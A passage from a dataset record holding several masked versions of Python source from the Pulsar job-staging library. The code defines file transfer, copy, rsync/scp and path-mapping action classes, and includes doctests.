staging server, and\n should be executed via ssh/rsync/etc\n \"\"\"\n inject_url = True\n action_type = 'remote_transfer'\n staging = STAGING_ACTION_REMOTE\n\n def __init__(self, source, file_lister=None, url=None):\n super().__init__(source, file_lister=file_lister)\n self.url = url\n\n def to_dict(self):\n return self._extend_base_dict(url=self.url)\n\n @classmethod\n def from_dict(cls, action_dict):\n return RemoteTransferAction(source=action_dict['source'], url=\n action_dict['url'])\n\n def write_to_path(self, path):\n get_file(self.url, path)\n\n def write_from_path(self, pulsar_path):\n post_file(self.url, pulsar_path)\n\n\nclass RemoteObjectStoreCopyAction(BaseAction):\n \"\"\"\n \"\"\"\n action_type = 'remote_object_store_copy'\n staging = STAGING_ACTION_REMOTE\n inject_object_store = True\n\n @classmethod\n def from_dict(cls, action_dict):\n return RemoteObjectStoreCopyAction(source=action_dict['source'])\n\n def write_to_path(self, path):\n assert self.object_store\n assert 'object_store_ref' in self.source\n object_store_ref = self.source['object_store_ref']\n dataset_object = Bunch(id=object_store_ref['dataset_id'], uuid=\n object_store_ref['dataset_uuid'], object_store_id=\n object_store_ref['object_store_id'])\n filename = self.object_store.get_filename(dataset_object)\n copy_to_path(open(filename, 'rb'), path)\n\n def write_from_path(self, pulsar_path):\n raise NotImplementedError(\n 'Writing raw files to object store not supported at this time.')\n\n\nclass PubkeyAuthenticatedTransferAction(BaseAction):\n \"\"\"Base class for file transfers requiring an SSH public/private key\n \"\"\"\n inject_ssh_properties = True\n action_spec = dict(ssh_key=UNSET_ACTION_KWD, ssh_user=UNSET_ACTION_KWD,\n ssh_host=UNSET_ACTION_KWD, ssh_port=UNSET_ACTION_KWD)\n staging = STAGING_ACTION_REMOTE\n\n def __init__(self, source, file_lister=None, ssh_user=UNSET_ACTION_KWD,\n ssh_host=UNSET_ACTION_KWD, ssh_port=UNSET_ACTION_KWD, ssh_key=\n UNSET_ACTION_KWD):\n super().__init__(source, file_lister=file_lister)\n self.ssh_user = ssh_user\n self.ssh_host = ssh_host\n self.ssh_port = ssh_port\n self.ssh_key = ssh_key\n\n def to_dict(self):\n return self._extend_base_dict(ssh_user=self.ssh_user, ssh_host=self\n .ssh_host, ssh_port=self.ssh_port)\n\n @contextmanager\n def _serialized_key(self):\n key_file = self.__serialize_ssh_key()\n yield key_file\n self.__cleanup_ssh_key(key_file)\n\n def __serialize_ssh_key(self):\n f = tempfile.NamedTemporaryFile(delete=False)\n if self.ssh_key is not None:\n f.write(self.ssh_key.encode('utf-8'))\n else:\n raise Exception('SSH_KEY not available')\n return f.name\n\n def __cleanup_ssh_key(self, keyfile):\n if exists(keyfile):\n unlink(keyfile)\n\n\nclass RsyncTransferAction(PubkeyAuthenticatedTransferAction):\n action_type = 'remote_rsync_transfer'\n\n @classmethod\n def from_dict(cls, action_dict):\n return RsyncTransferAction(source=action_dict['source'], ssh_user=\n action_dict['ssh_user'], ssh_host=action_dict['ssh_host'],\n ssh_port=action_dict['ssh_port'], ssh_key=action_dict['ssh_key'])\n\n def write_to_path(self, path):\n with self._serialized_key() as key_file:\n rsync_get_file(self.path, path, self.ssh_user, self.ssh_host,\n self.ssh_port, key_file)\n\n def write_from_path(self, pulsar_path):\n with self._serialized_key() as key_file:\n rsync_post_file(pulsar_path, self.path, self.ssh_user, self.\n ssh_host, self.ssh_port, key_file)\n\n\nclass ScpTransferAction(PubkeyAuthenticatedTransferAction):\n action_type = 'remote_scp_transfer'\n\n @classmethod\n def from_dict(cls, action_dict):\n return ScpTransferAction(source=action_dict['source'], ssh_user=\n action_dict['ssh_user'], ssh_host=action_dict['ssh_host'],\n ssh_port=action_dict['ssh_port'], ssh_key=action_dict['ssh_key'])\n\n def write_to_path(self, path):\n with self._serialized_key() as key_file:\n scp_get_file(self.path, path, self.ssh_user, self.ssh_host,\n self.ssh_port, key_file)\n\n def write_from_path(self, pulsar_path):\n with self._serialized_key() as key_file:\n scp_post_file(pulsar_path, self.path, self.ssh_user, self.\n ssh_host, self.ssh_port, key_file)\n\n\nclass MessageAction:\n \"\"\" Sort of pseudo action describing \"files\" store in memory and\n transferred via message (HTTP, Python-call, MQ, etc...)\n \"\"\"\n action_type = 'message'\n staging = STAGING_ACTION_DEFAULT\n\n def __init__(self, contents, client=None):\n self.contents = contents\n self.client = client\n\n @property\n def staging_needed(self):\n return True\n\n @property\n def staging_action_local(self):\n return self.client.prefer_local_staging\n\n def to_dict(self):\n return dict(contents=self.contents, action_type=MessageAction.\n action_type)\n\n @classmethod\n def from_dict(cls, action_dict):\n return MessageAction(contents=action_dict['contents'])\n\n def write_to_path(self, path):\n open(path, 'w').write(self.contents)\n\n\n<mask token>\n\n\nclass BasePathMapper:\n match_type: str\n\n def __init__(self, config):\n action_type = config.get('action', DEFAULT_MAPPED_ACTION)\n action_class = actions.get(action_type, None)\n action_kwds = action_class.action_spec.copy()\n for key, value in action_kwds.items():\n if key in config:\n action_kwds[key] = config[key]\n elif value is REQUIRED_ACTION_KWD:\n message_template = (\n 'action_type %s requires key word argument %s')\n message = message_template % (action_type, key)\n raise Exception(message)\n else:\n action_kwds[key] = value\n self.action_type = action_type\n self.action_kwds = action_kwds\n path_types_str = config.get('path_types', '*defaults*')\n path_types_str = path_types_str.replace('*defaults*', ','.join(\n ACTION_DEFAULT_PATH_TYPES))\n path_types_str = path_types_str.replace('*any*', ','.join(\n ALL_PATH_TYPES))\n self.path_types = path_types_str.split(',')\n self.file_lister = FileLister(config)\n\n def matches(self, path, path_type):\n path_type_matches = path_type in self.path_types\n rval = path_type_matches and self._path_matches(path)\n return rval\n\n def _extend_base_dict(self, **kwds):\n base_dict = dict(action=self.action_type, path_types=','.join(self.\n path_types), match_type=self.match_type)\n base_dict.update(self.file_lister.to_dict())\n base_dict.update(self.action_kwds)\n base_dict.update(**kwds)\n return base_dict\n\n def to_pattern(self):\n raise NotImplementedError()\n\n\nclass PathTypeOnlyMapper(BasePathMapper):\n match_type = 'path_type_only'\n\n def __init__(self, config):\n super().__init__(config)\n\n def _path_matches(self, path):\n return True\n\n def to_dict(self):\n return self._extend_base_dict()\n\n\nclass PrefixPathMapper(BasePathMapper):\n match_type = 'prefix'\n\n def __init__(self, config):\n super().__init__(config)\n self.prefix_path = abspath(config['path'])\n\n def _path_matches(self, path):\n return path is not None and path.startswith(self.prefix_path)\n\n def to_pattern(self):\n pattern_str = '({}{}[^\\\\s,\\\\\"\\\\\\']+)'.format(escape(self.\n prefix_path), escape(sep))\n return compile(pattern_str)\n\n def to_dict(self):\n return self._extend_base_dict(path=self.prefix_path)\n\n\nclass GlobPathMapper(BasePathMapper):\n match_type = 'glob'\n\n def __init__(self, config):\n super().__init__(config)\n self.glob_path = config['path']\n\n def _path_matches(self, path):\n return path is not None and fnmatch.fnmatch(path, self.glob_path)\n\n def to_pattern(self):\n return compile(fnmatch.translate(self.glob_path))\n\n def to_dict(self):\n return self._extend_base_dict(path=self.glob_path)\n\n\nclass RegexPathMapper(BasePathMapper):\n match_type = 'regex'\n\n def __init__(self, config):\n super().__init__(config)\n self.pattern_raw = config['path']\n self.pattern = compile(self.pattern_raw)\n\n def _path_matches(self, path):\n return path is not None and self.pattern.match(path) is not None\n\n def to_pattern(self):\n return self.pattern\n\n def to_dict(self):\n return self._extend_base_dict(path=self.pattern_raw)\n\n\n<mask token>\n\n\nclass FileLister:\n\n def __init__(self, config):\n self.depth = int(config.get('depth', '0'))\n\n def to_dict(self):\n return dict(depth=self.depth)\n\n def unstructured_map(self, path):\n depth = self.depth\n if self.depth == 0:\n return {path: basename(path)}\n else:\n while depth > 0:\n path = dirname(path)\n depth -= 1\n return {join(path, f): f for f in directory_files(path)}\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\nclass RewriteAction(BaseAction):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass TransferAction(BaseAction):\n \"\"\" This actions indicates that the Pulsar client should initiate an HTTP\n transfer of the corresponding path to the remote Pulsar server before\n launching the job. \"\"\"\n action_type = 'transfer'\n staging = STAGING_ACTION_LOCAL\n\n\nclass CopyAction(BaseAction):\n \"\"\" This action indicates that the Pulsar client should execute a file system\n copy of the corresponding path to the Pulsar staging directory prior to\n launching the corresponding job. \"\"\"\n action_type = 'copy'\n staging = STAGING_ACTION_LOCAL\n\n\nclass RemoteCopyAction(BaseAction):\n \"\"\" This action indicates the Pulsar server should copy the file before\n execution via direct file system copy. This is like a CopyAction, but\n it indicates the action should occur on the Pulsar server instead of on\n the client.\n \"\"\"\n action_type = 'remote_copy'\n staging = STAGING_ACTION_REMOTE\n\n @classmethod\n def from_dict(cls, action_dict):\n return RemoteCopyAction(source=action_dict['source'])\n\n def write_to_path(self, path):\n copy_to_path(open(self.path, 'rb'), path)\n\n def write_from_path(self, pulsar_path):\n destination = self.path\n parent_directory = dirname(destination)\n if not exists(parent_directory):\n makedirs(parent_directory)\n with open(pulsar_path, 'rb') as f:\n copy_to_path(f, destination)\n\n\nclass RemoteTransferAction(BaseAction):\n \"\"\" This action indicates the Pulsar server should transfer the file before\n execution via one of the remote transfer implementations. This is like a TransferAction, but\n it indicates the action requires network access to the staging server, and\n should be executed via ssh/rsync/etc\n \"\"\"\n inject_url = True\n action_type = 'remote_transfer'\n staging = STAGING_ACTION_REMOTE\n\n def __init__(self, source, file_lister=None, url=None):\n super().__init__(source, file_lister=file_lister)\n self.url = url\n\n def to_dict(self):\n return self._extend_base_dict(url=self.url)\n\n @classmethod\n def from_dict(cls, action_dict):\n return RemoteTransferAction(source=action_dict['source'], url=\n action_dict['url'])\n\n def write_to_path(self, path):\n get_file(self.url, path)\n\n def write_from_path(self, pulsar_path):\n post_file(self.url, pulsar_path)\n\n\nclass RemoteObjectStoreCopyAction(BaseAction):\n \"\"\"\n \"\"\"\n action_type = 'remote_object_store_copy'\n staging = STAGING_ACTION_REMOTE\n inject_object_store = True\n\n @classmethod\n def from_dict(cls, action_dict):\n return RemoteObjectStoreCopyAction(source=action_dict['source'])\n\n def write_to_path(self, path):\n assert self.object_store\n assert 'object_store_ref' in self.source\n object_store_ref = self.source['object_store_ref']\n dataset_object = Bunch(id=object_store_ref['dataset_id'], uuid=\n object_store_ref['dataset_uuid'], object_store_id=\n object_store_ref['object_store_id'])\n filename = self.object_store.get_filename(dataset_object)\n copy_to_path(open(filename, 'rb'), path)\n\n def write_from_path(self, pulsar_path):\n raise NotImplementedError(\n 'Writing raw files to object store not supported at this time.')\n\n\nclass PubkeyAuthenticatedTransferAction(BaseAction):\n \"\"\"Base class for file transfers requiring an SSH public/private key\n \"\"\"\n inject_ssh_properties = True\n action_spec = dict(ssh_key=UNSET_ACTION_KWD, ssh_user=UNSET_ACTION_KWD,\n ssh_host=UNSET_ACTION_KWD, ssh_port=UNSET_ACTION_KWD)\n staging = STAGING_ACTION_REMOTE\n\n def __init__(self, source, file_lister=None, ssh_user=UNSET_ACTION_KWD,\n ssh_host=UNSET_ACTION_KWD, ssh_port=UNSET_ACTION_KWD, ssh_key=\n UNSET_ACTION_KWD):\n super().__init__(source, file_lister=file_lister)\n self.ssh_user = ssh_user\n self.ssh_host = ssh_host\n self.ssh_port = ssh_port\n self.ssh_key = ssh_key\n\n def to_dict(self):\n return self._extend_base_dict(ssh_user=self.ssh_user, ssh_host=self\n .ssh_host, ssh_port=self.ssh_port)\n\n @contextmanager\n def _serialized_key(self):\n key_file = self.__serialize_ssh_key()\n yield key_file\n self.__cleanup_ssh_key(key_file)\n\n def __serialize_ssh_key(self):\n f = tempfile.NamedTemporaryFile(delete=False)\n if self.ssh_key is not None:\n f.write(self.ssh_key.encode('utf-8'))\n else:\n raise Exception('SSH_KEY not available')\n return f.name\n\n def __cleanup_ssh_key(self, keyfile):\n if exists(keyfile):\n unlink(keyfile)\n\n\nclass RsyncTransferAction(PubkeyAuthenticatedTransferAction):\n action_type = 'remote_rsync_transfer'\n\n @classmethod\n def from_dict(cls, action_dict):\n return RsyncTransferAction(source=action_dict['source'], ssh_user=\n action_dict['ssh_user'], ssh_host=action_dict['ssh_host'],\n ssh_port=action_dict['ssh_port'], ssh_key=action_dict['ssh_key'])\n\n def write_to_path(self, path):\n with self._serialized_key() as key_file:\n rsync_get_file(self.path, path, self.ssh_user, self.ssh_host,\n self.ssh_port, key_file)\n\n def write_from_path(self, pulsar_path):\n with self._serialized_key() as key_file:\n rsync_post_file(pulsar_path, self.path, self.ssh_user, self.\n ssh_host, self.ssh_port, key_file)\n\n\nclass ScpTransferAction(PubkeyAuthenticatedTransferAction):\n action_type = 'remote_scp_transfer'\n\n @classmethod\n def from_dict(cls, action_dict):\n return ScpTransferAction(source=action_dict['source'], ssh_user=\n action_dict['ssh_user'], ssh_host=action_dict['ssh_host'],\n ssh_port=action_dict['ssh_port'], ssh_key=action_dict['ssh_key'])\n\n def write_to_path(self, path):\n with self._serialized_key() as key_file:\n scp_get_file(self.path, path, self.ssh_user, self.ssh_host,\n self.ssh_port, key_file)\n\n def write_from_path(self, pulsar_path):\n with self._serialized_key() as key_file:\n scp_post_file(pulsar_path, self.path, self.ssh_user, self.\n ssh_host, self.ssh_port, key_file)\n\n\nclass MessageAction:\n \"\"\" Sort of pseudo action describing \"files\" store in memory and\n transferred via message (HTTP, Python-call, MQ, etc...)\n \"\"\"\n action_type = 'message'\n staging = STAGING_ACTION_DEFAULT\n\n def __init__(self, contents, client=None):\n self.contents = contents\n self.client = client\n\n @property\n def staging_needed(self):\n return True\n\n @property\n def staging_action_local(self):\n return self.client.prefer_local_staging\n\n def to_dict(self):\n return dict(contents=self.contents, action_type=MessageAction.\n action_type)\n\n @classmethod\n def from_dict(cls, action_dict):\n return MessageAction(contents=action_dict['contents'])\n\n def write_to_path(self, path):\n open(path, 'w').write(self.contents)\n\n\n<mask token>\n\n\nclass BasePathMapper:\n match_type: str\n\n def __init__(self, config):\n action_type = config.get('action', DEFAULT_MAPPED_ACTION)\n action_class = actions.get(action_type, None)\n action_kwds = action_class.action_spec.copy()\n for key, value in action_kwds.items():\n if key in config:\n action_kwds[key] = config[key]\n elif value is REQUIRED_ACTION_KWD:\n message_template = (\n 'action_type %s requires key word argument %s')\n message = message_template % (action_type, key)\n raise Exception(message)\n else:\n action_kwds[key] = value\n self.action_type = action_type\n self.action_kwds = action_kwds\n path_types_str = config.get('path_types', '*defaults*')\n path_types_str = path_types_str.replace('*defaults*', ','.join(\n ACTION_DEFAULT_PATH_TYPES))\n path_types_str = path_types_str.replace('*any*', ','.join(\n ALL_PATH_TYPES))\n self.path_types = path_types_str.split(',')\n self.file_lister = FileLister(config)\n\n def matches(self, path, path_type):\n path_type_matches = path_type in self.path_types\n rval = path_type_matches and self._path_matches(path)\n return rval\n\n def _extend_base_dict(self, **kwds):\n base_dict = dict(action=self.action_type, path_types=','.join(self.\n path_types), match_type=self.match_type)\n base_dict.update(self.file_lister.to_dict())\n base_dict.update(self.action_kwds)\n base_dict.update(**kwds)\n return base_dict\n\n def to_pattern(self):\n raise NotImplementedError()\n\n\nclass PathTypeOnlyMapper(BasePathMapper):\n match_type = 'path_type_only'\n\n def __init__(self, config):\n super().__init__(config)\n\n def _path_matches(self, path):\n return True\n\n def to_dict(self):\n return self._extend_base_dict()\n\n\nclass PrefixPathMapper(BasePathMapper):\n match_type = 'prefix'\n\n def __init__(self, config):\n super().__init__(config)\n self.prefix_path = abspath(config['path'])\n\n def _path_matches(self, path):\n return path is not None and path.startswith(self.prefix_path)\n\n def to_pattern(self):\n pattern_str = '({}{}[^\\\\s,\\\\\"\\\\\\']+)'.format(escape(self.\n prefix_path), escape(sep))\n return compile(pattern_str)\n\n def to_dict(self):\n return self._extend_base_dict(path=self.prefix_path)\n\n\nclass GlobPathMapper(BasePathMapper):\n match_type = 'glob'\n\n def __init__(self, config):\n super().__init__(config)\n self.glob_path = config['path']\n\n def _path_matches(self, path):\n return path is not None and fnmatch.fnmatch(path, self.glob_path)\n\n def to_pattern(self):\n return compile(fnmatch.translate(self.glob_path))\n\n def to_dict(self):\n return self._extend_base_dict(path=self.glob_path)\n\n\nclass RegexPathMapper(BasePathMapper):\n match_type = 'regex'\n\n def __init__(self, config):\n super().__init__(config)\n self.pattern_raw = config['path']\n self.pattern = compile(self.pattern_raw)\n\n def _path_matches(self, path):\n return path is not None and self.pattern.match(path) is not None\n\n def to_pattern(self):\n return self.pattern\n\n def to_dict(self):\n return self._extend_base_dict(path=self.pattern_raw)\n\n\n<mask token>\n\n\nclass FileLister:\n\n def __init__(self, config):\n self.depth = int(config.get('depth', '0'))\n\n def to_dict(self):\n return dict(depth=self.depth)\n\n def unstructured_map(self, path):\n depth = self.depth\n if self.depth == 0:\n return {path: basename(path)}\n else:\n while depth > 0:\n path = dirname(path)\n depth -= 1\n return {join(path, f): f for f in directory_files(path)}\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\nclass NoneAction(BaseAction):\n <mask token>\n action_type = 'none'\n staging = STAGING_ACTION_NONE\n\n def to_dict(self):\n return self._extend_base_dict()\n\n @classmethod\n def from_dict(cls, action_dict):\n return NoneAction(source=action_dict['source'])\n\n def path_rewrite(self, path_helper, path=None):\n return None\n\n\nclass RewriteAction(BaseAction):\n \"\"\" This actin indicates the Pulsar server should simply rewrite the path\n to the specified file.\n \"\"\"\n action_spec = dict(source_directory=REQUIRED_ACTION_KWD,\n destination_directory=REQUIRED_ACTION_KWD)\n action_type = 'rewrite'\n staging = STAGING_ACTION_NONE\n\n def __init__(self, source, file_lister=None, source_directory=None,\n destination_directory=None):\n super().__init__(source, file_lister=file_lister)\n self.source_directory = source_directory\n self.destination_directory = destination_directory\n\n def to_dict(self):\n return self._extend_base_dict(source_directory=self.\n source_directory, destination_directory=self.destination_directory)\n\n @classmethod\n def from_dict(cls, action_dict):\n return RewriteAction(source=action_dict['source'], source_directory\n =action_dict['source_directory'], destination_directory=\n action_dict['destination_directory'])\n\n def path_rewrite(self, path_helper, path=None):\n if not path:\n path = self.path\n new_path = path_helper.from_posix_with_new_base(self.path, self.\n source_directory, self.destination_directory)\n return None if new_path == self.path else new_path\n\n\nclass TransferAction(BaseAction):\n \"\"\" This actions indicates that the Pulsar client should initiate an HTTP\n transfer of the corresponding path to the remote Pulsar server before\n launching the job. \"\"\"\n action_type = 'transfer'\n staging = STAGING_ACTION_LOCAL\n\n\nclass CopyAction(BaseAction):\n \"\"\" This action indicates that the Pulsar client should execute a file system\n copy of the corresponding path to the Pulsar staging directory prior to\n launching the corresponding job. \"\"\"\n action_type = 'copy'\n staging = STAGING_ACTION_LOCAL\n\n\nclass RemoteCopyAction(BaseAction):\n \"\"\" This action indicates the Pulsar server should copy the file before\n execution via direct file system copy. This is like a CopyAction, but\n it indicates the action should occur on the Pulsar server instead of on\n the client.\n \"\"\"\n action_type = 'remote_copy'\n staging = STAGING_ACTION_REMOTE\n\n @classmethod\n def from_dict(cls, action_dict):\n return RemoteCopyAction(source=action_dict['source'])\n\n def write_to_path(self, path):\n copy_to_path(open(self.path, 'rb'), path)\n\n def write_from_path(self, pulsar_path):\n destination = self.path\n parent_directory = dirname(destination)\n if not exists(parent_directory):\n makedirs(parent_directory)\n with open(pulsar_path, 'rb') as f:\n copy_to_path(f, destination)\n\n\nclass RemoteTransferAction(BaseAction):\n \"\"\" This action indicates the Pulsar server should transfer the file before\n execution via one of the remote transfer implementations. This is like a TransferAction, but\n it indicates the action requires network access to the staging server, and\n should be executed via ssh/rsync/etc\n \"\"\"\n inject_url = True\n action_type = 'remote_transfer'\n staging = STAGING_ACTION_REMOTE\n\n def __init__(self, source, file_lister=None, url=None):\n super().__init__(source, file_lister=file_lister)\n self.url = url\n\n def to_dict(self):\n return self._extend_base_dict(url=self.url)\n\n @classmethod\n def from_dict(cls, action_dict):\n return RemoteTransferAction(source=action_dict['source'], url=\n action_dict['url'])\n\n def write_to_path(self, path):\n get_file(self.url, path)\n\n def write_from_path(self, pulsar_path):\n post_file(self.url, pulsar_path)\n\n\nclass RemoteObjectStoreCopyAction(BaseAction):\n \"\"\"\n \"\"\"\n action_type = 'remote_object_store_copy'\n staging = STAGING_ACTION_REMOTE\n inject_object_store = True\n\n @classmethod\n def from_dict(cls, action_dict):\n return RemoteObjectStoreCopyAction(source=action_dict['source'])\n\n def write_to_path(self, path):\n assert self.object_store\n assert 'object_store_ref' in self.source\n object_store_ref = self.source['object_store_ref']\n dataset_object = Bunch(id=object_store_ref['dataset_id'], uuid=\n object_store_ref['dataset_uuid'], object_store_id=\n object_store_ref['object_store_id'])\n filename = self.object_store.get_filename(dataset_object)\n copy_to_path(open(filename, 'rb'), path)\n\n def write_from_path(self, pulsar_path):\n raise NotImplementedError(\n 'Writing raw files to object store not supported at this time.')\n\n\nclass PubkeyAuthenticatedTransferAction(BaseAction):\n \"\"\"Base class for file transfers requiring an SSH public/private key\n \"\"\"\n inject_ssh_properties = True\n action_spec = dict(ssh_key=UNSET_ACTION_KWD, ssh_user=UNSET_ACTION_KWD,\n ssh_host=UNSET_ACTION_KWD, ssh_port=UNSET_ACTION_KWD)\n staging = STAGING_ACTION_REMOTE\n\n def __init__(self, source, file_lister=None, ssh_user=UNSET_ACTION_KWD,\n ssh_host=UNSET_ACTION_KWD, ssh_port=UNSET_ACTION_KWD, ssh_key=\n UNSET_ACTION_KWD):\n super().__init__(source, file_lister=file_lister)\n self.ssh_user = ssh_user\n self.ssh_host = ssh_host\n self.ssh_port = ssh_port\n self.ssh_key = ssh_key\n\n def to_dict(self):\n return self._extend_base_dict(ssh_user=self.ssh_user, ssh_host=self\n .ssh_host, ssh_port=self.ssh_port)\n\n @contextmanager\n def _serialized_key(self):\n key_file = self.__serialize_ssh_key()\n yield key_file\n self.__cleanup_ssh_key(key_file)\n\n def __serialize_ssh_key(self):\n f = tempfile.NamedTemporaryFile(delete=False)\n if self.ssh_key is not None:\n f.write(self.ssh_key.encode('utf-8'))\n else:\n raise Exception('SSH_KEY not available')\n return f.name\n\n def __cleanup_ssh_key(self, keyfile):\n if exists(keyfile):\n unlink(keyfile)\n\n\nclass RsyncTransferAction(PubkeyAuthenticatedTransferAction):\n action_type = 'remote_rsync_transfer'\n\n @classmethod\n def from_dict(cls, action_dict):\n return RsyncTransferAction(source=action_dict['source'], ssh_user=\n action_dict['ssh_user'], ssh_host=action_dict['ssh_host'],\n ssh_port=action_dict['ssh_port'], ssh_key=action_dict['ssh_key'])\n\n def write_to_path(self, path):\n with self._serialized_key() as key_file:\n rsync_get_file(self.path, path, self.ssh_user, self.ssh_host,\n self.ssh_port, key_file)\n\n def write_from_path(self, pulsar_path):\n with self._serialized_key() as key_file:\n rsync_post_file(pulsar_path, self.path, self.ssh_user, self.\n ssh_host, self.ssh_port, key_file)\n\n\nclass ScpTransferAction(PubkeyAuthenticatedTransferAction):\n action_type = 'remote_scp_transfer'\n\n @classmethod\n def from_dict(cls, action_dict):\n return ScpTransferAction(source=action_dict['source'], ssh_user=\n action_dict['ssh_user'], ssh_host=action_dict['ssh_host'],\n ssh_port=action_dict['ssh_port'], ssh_key=action_dict['ssh_key'])\n\n def write_to_path(self, path):\n with self._serialized_key() as key_file:\n scp_get_file(self.path, path, self.ssh_user, self.ssh_host,\n self.ssh_port, key_file)\n\n def write_from_path(self, pulsar_path):\n with self._serialized_key() as key_file:\n scp_post_file(pulsar_path, self.path, self.ssh_user, self.\n ssh_host, self.ssh_port, key_file)\n\n\nclass MessageAction:\n \"\"\" Sort of pseudo action describing \"files\" store in memory and\n transferred via message (HTTP, Python-call, MQ, etc...)\n \"\"\"\n action_type = 'message'\n staging = STAGING_ACTION_DEFAULT\n\n def __init__(self, contents, client=None):\n self.contents = contents\n self.client = client\n\n @property\n def staging_needed(self):\n return True\n\n @property\n def staging_action_local(self):\n return self.client.prefer_local_staging\n\n def to_dict(self):\n return dict(contents=self.contents, action_type=MessageAction.\n action_type)\n\n @classmethod\n def from_dict(cls, action_dict):\n return MessageAction(contents=action_dict['contents'])\n\n def write_to_path(self, path):\n open(path, 'w').write(self.contents)\n\n\n<mask token>\n\n\nclass BasePathMapper:\n match_type: str\n\n def __init__(self, config):\n action_type = config.get('action', DEFAULT_MAPPED_ACTION)\n action_class = actions.get(action_type, None)\n action_kwds = action_class.action_spec.copy()\n for key, value in action_kwds.items():\n if key in config:\n action_kwds[key] = config[key]\n elif value is REQUIRED_ACTION_KWD:\n message_template = (\n 'action_type %s requires key word argument %s')\n message = message_template % (action_type, key)\n raise Exception(message)\n else:\n action_kwds[key] = value\n self.action_type = action_type\n self.action_kwds = action_kwds\n path_types_str = config.get('path_types', '*defaults*')\n path_types_str = path_types_str.replace('*defaults*', ','.join(\n ACTION_DEFAULT_PATH_TYPES))\n path_types_str = path_types_str.replace('*any*', ','.join(\n ALL_PATH_TYPES))\n self.path_types = path_types_str.split(',')\n self.file_lister = FileLister(config)\n\n def matches(self, path, path_type):\n path_type_matches = path_type in self.path_types\n rval = path_type_matches and self._path_matches(path)\n return rval\n\n def _extend_base_dict(self, **kwds):\n base_dict = dict(action=self.action_type, path_types=','.join(self.\n path_types), match_type=self.match_type)\n base_dict.update(self.file_lister.to_dict())\n base_dict.update(self.action_kwds)\n base_dict.update(**kwds)\n return base_dict\n\n def to_pattern(self):\n raise NotImplementedError()\n\n\nclass PathTypeOnlyMapper(BasePathMapper):\n match_type = 'path_type_only'\n\n def __init__(self, config):\n super().__init__(config)\n\n def _path_matches(self, path):\n return True\n\n def to_dict(self):\n return self._extend_base_dict()\n\n\nclass PrefixPathMapper(BasePathMapper):\n match_type = 'prefix'\n\n def __init__(self, config):\n super().__init__(config)\n self.prefix_path = abspath(config['path'])\n\n def _path_matches(self, path):\n return path is not None and path.startswith(self.prefix_path)\n\n def to_pattern(self):\n pattern_str = '({}{}[^\\\\s,\\\\\"\\\\\\']+)'.format(escape(self.\n prefix_path), escape(sep))\n return compile(pattern_str)\n\n def to_dict(self):\n return self._extend_base_dict(path=self.prefix_path)\n\n\nclass GlobPathMapper(BasePathMapper):\n match_type = 'glob'\n\n def __init__(self, config):\n super().__init__(config)\n self.glob_path = config['path']\n\n def _path_matches(self, path):\n return path is not None and fnmatch.fnmatch(path, self.glob_path)\n\n def to_pattern(self):\n return compile(fnmatch.translate(self.glob_path))\n\n def to_dict(self):\n return self._extend_base_dict(path=self.glob_path)\n\n\nclass RegexPathMapper(BasePathMapper):\n match_type = 'regex'\n\n def __init__(self, config):\n super().__init__(config)\n self.pattern_raw = config['path']\n self.pattern = compile(self.pattern_raw)\n\n def _path_matches(self, path):\n return path is not None and self.pattern.match(path) is not None\n\n def to_pattern(self):\n return self.pattern\n\n def to_dict(self):\n return self._extend_base_dict(path=self.pattern_raw)\n\n\n<mask token>\n\n\nclass FileLister:\n\n def __init__(self, config):\n self.depth = int(config.get('depth', '0'))\n\n def to_dict(self):\n return dict(depth=self.depth)\n\n def unstructured_map(self, path):\n depth = self.depth\n if self.depth == 0:\n return {path: basename(path)}\n else:\n while depth > 0:\n path = dirname(path)\n depth -= 1\n return {join(path, f): f for f in directory_files(path)}\n\n\n<mask token>\n", "step-4": "<mask token>\n\n\nclass FileActionMapper:\n \"\"\"\n Objects of this class define how paths are mapped to actions.\n\n >>> json_string = r'''{\"paths\": [ {\"path\": \"/opt/galaxy\", \"action\": \"none\"}, {\"path\": \"/galaxy/data\", \"action\": \"transfer\"}, {\"path\": \"/cool/bamfiles/**/*.bam\", \"action\": \"copy\", \"match_type\": \"glob\"}, {\"path\": \".*/dataset_\\\\\\\\d+.dat\", \"action\": \"copy\", \"match_type\": \"regex\"} ]}'''\n >>> from tempfile import NamedTemporaryFile\n >>> from os import unlink\n >>> def mapper_for(default_action, config_contents):\n ... f = NamedTemporaryFile(delete=False)\n ... f.write(config_contents.encode('UTF-8'))\n ... f.close()\n ... mock_client = Bunch(default_file_action=default_action, action_config_path=f.name, files_endpoint=None)\n ... mapper = FileActionMapper(mock_client)\n ... as_dict = config=mapper.to_dict()\n ... mapper = FileActionMapper(config=as_dict) # Serialize and deserialize it to make sure still works\n ... unlink(f.name)\n ... return mapper\n >>> mapper = mapper_for(default_action='none', config_contents=json_string)\n >>> # Test first config line above, implicit path prefix mapper\n >>> action = mapper.action({'path': '/opt/galaxy/tools/filters/catWrapper.py'}, 'input')\n >>> action.action_type == u'none'\n True\n >>> action.staging_needed\n False\n >>> # Test another (2nd) mapper, this one with a different action\n >>> action = mapper.action({'path': '/galaxy/data/files/000/dataset_1.dat'}, 'input')\n >>> action.action_type == u'transfer'\n True\n >>> action.staging_needed\n True\n >>> # Always at least copy work_dir outputs.\n >>> action = mapper.action({'path': '/opt/galaxy/database/working_directory/45.sh'}, 'workdir')\n >>> action.action_type == u'copy'\n True\n >>> action.staging_needed\n True\n >>> # Test glob mapper (matching test)\n >>> mapper.action({'path': '/cool/bamfiles/projectABC/study1/patient3.bam'}, 'input').action_type == u'copy'\n True\n >>> # Test glob mapper (non-matching test)\n >>> mapper.action({'path': '/cool/bamfiles/projectABC/study1/patient3.bam.bai'}, 'input').action_type == u'none'\n True\n >>> # Regex mapper test.\n >>> mapper.action({'path': '/old/galaxy/data/dataset_10245.dat'}, 'input').action_type == u'copy'\n True\n >>> # Doesn't map unstructured paths by default\n >>> mapper.action({'path': '/old/galaxy/data/dataset_10245.dat'}, 'unstructured').action_type == u'none'\n True\n >>> input_only_mapper = mapper_for(default_action=\"none\", config_contents=r'''{\"paths\": [ {\"path\": \"/\", \"action\": \"transfer\", \"path_types\": \"input\"} ] }''')\n >>> input_only_mapper.action({'path': '/dataset_1.dat'}, 'input').action_type == u'transfer'\n True\n >>> input_only_mapper.action({'path': '/dataset_1.dat'}, 'output').action_type == u'none'\n True\n >>> unstructured_mapper = mapper_for(default_action=\"none\", config_contents=r'''{\"paths\": [ {\"path\": 